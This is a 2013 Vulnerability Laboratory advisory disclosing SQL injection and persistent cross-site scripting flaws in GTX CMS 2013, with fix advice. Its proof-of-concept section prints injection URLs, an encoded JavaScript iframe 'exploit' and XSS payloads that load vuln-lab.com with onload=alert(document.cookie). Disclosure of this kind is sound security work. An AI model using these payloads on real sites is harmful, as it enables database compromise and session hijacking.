296 lines
No EOL
12 KiB
Text
296 lines
No EOL
12 KiB
Text
Document Title:
|
||
===============
|
||
GTX CMS 2013 Optima - Multiple Web Vulnerabilities
|
||
|
||
|
||
References (Source):
|
||
====================
|
||
http://www.vulnerability-lab.com/get_content.php?id=1124
|
||
|
||
|
||
Release Date:
|
||
=============
|
||
2013-10-29
|
||
|
||
|
||
Vulnerability Laboratory ID (VL-ID):
|
||
====================================
|
||
1124
|
||
|
||
|
||
Common Vulnerability Scoring System:
|
||
====================================
|
||
7.2
|
||
|
||
|
||
Product & Service Introduction:
|
||
===============================
|
||
We provide you with the perfect community GTX CMS software solution - making it ready to meet your needs and
|
||
requirements and tailored to your corporate design! The complete setup of your individual interactive community
|
||
portal or your website is done by us, so you can get started right away!
|
||
|
||
GTX CMS is extremely flexible and can be operated as a closed community (eg parallel to your existing website)
|
||
and as a normal website with a closed member.Datails, refer to the section `About GTX CMS`.
|
||
|
||
(Copy of the Vendor Homepage: http://www.gtx-cms.de/ )
|
||
|
||
|
||
Abstract Advisory Information:
|
||
==============================
|
||
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official GTX Content Management System 2013 web application.
|
||
|
||
|
||
Vulnerability Disclosure Timeline:
|
||
==================================
|
||
2013-10-29: Public Disclosure (Vulnerability Laboratory)
|
||
|
||
|
||
Discovery Status:
|
||
=================
|
||
Published
|
||
|
||
|
||
Affected Product(s):
|
||
====================
|
||
OBM-Media e.K.
|
||
Product: GTX CMS - Web Application Basic, Standard and Optima
|
||
|
||
|
||
Exploitation Technique:
|
||
=======================
|
||
Remote
|
||
|
||
|
||
Severity Level:
|
||
===============
|
||
High
|
||
|
||
|
||
Technical Details & Description:
|
||
================================
|
||
1.1
|
||
Multiple remote sql injection web vulnerabilities are detected in the official GTX Content Management System 2013 web application.
|
||
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms.
|
||
|
||
The sql injection vulnerabilities are located in the vulnerable `objId` and `modId` values of the tagSearchTag module. Remote attackers are
|
||
able to inject own sql commands via GET method request to compromise the database management system or cms web-application. The inject can
|
||
be done by usage of the executable ajax path via GET method request or by usage of the objId in the tagSearchTag module POST method request.
|
||
The severity of the remote sql injection bugs is estimated as high.
|
||
|
||
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
|
||
Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] ajax
|
||
|
||
Vulnerable File(s):
|
||
[+] tagSearchTag
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] objId
|
||
[+] modId
|
||
|
||
|
||
|
||
1.2
|
||
Multiple persistent input validation web vulnerabilities are detected in the official GTX Content Management System 2013 web application.
|
||
The web vulnerability allows remote attackers to inject via POST method own malicious script codes to the online service application-side.
|
||
|
||
The first persistent input validation web vulnerability is located in the ajax `tag-searchTag` module and the connected vulnerable
|
||
q parameter. Remote attackers are able to inject own malicious script codes as tag name. The execute occurs in the main communication
|
||
module when an user/admin is processing to review the article or comments. Exploitation of the vulnerability requires a low privileged
|
||
web-application user account and only low user interaction (view, no click!).
|
||
|
||
The secound persistent web vulnerability is located in the `linkverzeichnis` (link-directory) add module. Remote attackers are able
|
||
to inject own malicious script codes as `Schl<68>sselworter` (keywords) in the search. The execute occurs in the main link directory
|
||
module of the web-application. Exploitation of the vulnerability requires a low privileged web-application user account and low or
|
||
medium user interaction (click!).
|
||
|
||
The third persistent web vulnerability is located in the `Ordnerverwaltung` (Folder/Path Management) module. Remote attackers are
|
||
able to manipulate the vulnerable `ordner` name value in the add POST method request. The execute occurs in the main path of the
|
||
`persoenliche nachrichten` (private messages) module in the cms control panel. Exploitation of the vulnerability requires a low
|
||
privileged web-application user account and medium user interaction (add+click!).
|
||
|
||
Successful exploitation of the remote vulnerabilities lead to persistent session hijacking (customers), account steal via persistent
|
||
web attacks, persistent phishing, persistent redirect to external sources, persistent redirect as file downloads or persistent
|
||
manipulation of affected and connected context.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] ajax/tagSearchTag
|
||
[+] suche/linkverzeichnis
|
||
[+] pers-nachrichten/ordnerverwaltung
|
||
|
||
Vulnerable Input(s):
|
||
[+] Tags
|
||
[+] Suche - Linkverzeichnis > Schl<68>sselw<6C>rter - Suchbegriff(e) & Entfernung von
|
||
[+] Orderverwaltung - Add
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] q
|
||
[+] keywords
|
||
[+] ordner
|
||
|
||
|
||
Proof of Concept (PoC):
|
||
=======================
|
||
1.1
|
||
The sql injection web vulnerabilities can be exploited by remote attackers with low privileged web application user account and
|
||
without user interaction. For demonstration or to reproduce ...
|
||
|
||
PoC:
|
||
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL INJECTION VULNErABILITY!]--
|
||
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd%20'null[SQL INJECTION VULNErABILITY!]--&objId=3
|
||
|
||
|
||
Exploit:
|
||
<script type=``text/javascript``>document.write(unescape(``<script type=\``text\/javascript\
|
||
``>document.write\(unescape\(\``%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EGTX%20CMS%20-
|
||
%20SQL%20INJECTION%20EXPLOIT%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//gtx.localhost
|
||
%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId%3Dptd%26objId%3D37_%2520%27null
|
||
%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D%22800%22%3E%0A%3C
|
||
iframe%20src%3Dhttp%3A//gtx.localhost%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId
|
||
%3Dptd%2520%27null%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D
|
||
%22800%22%3E%26objId%3Dx%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E%0A%0A\``\)\);<\/script>``));</script>
|
||
|
||
|
||
|
||
|
||
1.2
|
||
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged web application user accounts
|
||
and low user interaction. For demonstration or to reproduce ...
|
||
|
||
|
||
1.2.1
|
||
|
||
PoC: Tags in Article or News
|
||
<div class=``right``>
|
||
<div id=``tagTagsWidget``>
|
||
<ul class=``as-selections`` id=``as-selections-049``><li class=``as-selection-item blur``
|
||
id=``as-selection-002``><a class=``as-close``><3E></a>>``<iframe src=``GTX-CMS.de%20%20Mitglieder-
|
||
Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20
|
||
geeignet%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Link%20hinzuf%C3%BCgen_files/a.htm``></iframe></li><li class=``as-original``
|
||
id=``as-original-049``><input autocomplete=``off`` name=``tags`` id=``as-input-049`` class=``text as-input`` type=``text``>
|
||
<input value=``>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>``
|
||
<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>,>``
|
||
<iframe src=http://vuln-lab.com>,`` class=``as-values`` name=``as_values_049`` id=``as-values-049`` type=``hidden``></li></ul>
|
||
<div style=``display: none;`` class=``as-results`` id=``as-results-049``></div>
|
||
</div>
|
||
|
||
|
||
Inject: Tags
|
||
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
|
||
|
||
PoC (PATH):
|
||
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null
|
||
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E%20&modId=ptd&objId=null
|
||
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Dhttp%3Avuln-lab.com%3E&modId=ptd&objId=null
|
||
|
||
|
||
|
||
1.2.2
|
||
|
||
PoC: Suchbegriff(e) & Entfernung von
|
||
|
||
<div class=``box``>
|
||
<div class=``formItems``>
|
||
<div class=``item row1``>
|
||
<div class=``left``>
|
||
Schl<EFBFBD>sselw<EFBFBD>rter</div><div class=``right``>>``<iframe src=``GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs,
|
||
%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Suche%20%C2%BB%20
|
||
Linkverzeichnis%20%C2%BB%20Ergebnisse2_files/a.htm`` onload=``alert(document.cookie)`` <=```` div=````>
|
||
</div>
|
||
</div>
|
||
</div>
|
||
|
||
|
||
Inject: Suchbegriff(e) & Entfernung von
|
||
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
|
||
|
||
Output:
|
||
Suche - Linkverzeichnis > Schl<68>sselw<6C>rter
|
||
http://gtx-cms.localhost:8080/suche/linkverzeichnis
|
||
|
||
|
||
|
||
|
||
1.2.3
|
||
|
||
PoC: Ordnerverwaltung - Ordner Name
|
||
|
||
<li class=``seperator``></li>
|
||
<!-- Users folders -->
|
||
<li><a class=``icon`` href=``/pers-nachrichten/ordner/iframe-srchttpvuln-labcom-onloadalertdocumentcookie-
|
||
iframe-srchttpvuln-labcom-onloadalertdocumentcookie-_1``>
|
||
<img src=``images/icons/Sophistique/files_24.png`` alt=``Ordner``>
|
||
<span>>``<iframe src=``http://vuln-lab.com`` onload=``alert(document.cookie)`` <=``
|
||
%20%20.``>``<iframe src=http://vuln-lab.com onload=alert(document.cookie) < (0)</span>
|
||
</a></li>
|
||
|
||
|
||
Inject: OrderVerwaltung Add
|
||
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
|
||
|
||
Output: Pers<72>nliche Nachrichten
|
||
http://gtx-cms.localhost:8080/pers-nachrichten
|
||
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
|
||
|
||
|
||
Solution - Fix & Patch:
|
||
=======================
|
||
1.1
|
||
The sql injection web vulnerabilities can be patched by a secure parse and encode of the vulnerable `modId` and `objId` values in
|
||
the tag search module.
|
||
|
||
1.2
|
||
The persistent input validation web vulnerabilities can be patched by a secure parse and encode of the vulnerable
|
||
ordner name, q and keyword parameters.
|
||
Encode the output index of the ordner name in the private messages box and connected resources.
|
||
Parse the tag search error output to prevent script code executions.
|
||
|
||
|
||
Security Risk:
|
||
==============
|
||
1.1
|
||
The security risk of the remote sql injection web vulnerabilities are estimated as high(+).
|
||
|
||
1.2
|
||
The security risk of the persistent input validation web vulnerabilities are estimated as medium(+).
|
||
|
||
|
||
Credits & Authors:
|
||
==================
|
||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||
|
||
|
||
Disclaimer & Information:
|
||
=========================
|
||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||
or trade with fraud/stolen material.
|
||
|
||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||
|
||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||
|
||
Copyright <20> 2013 | Vulnerability Laboratory [Evolution Security]
|
||
|
||
|
||
|
||
--
|
||
VULNERABILITY LABORATORY RESEARCH TEAM
|
||
DOMAIN: www.vulnerability-lab.com
|
||
CONTACT: research@vulnerability-lab.com |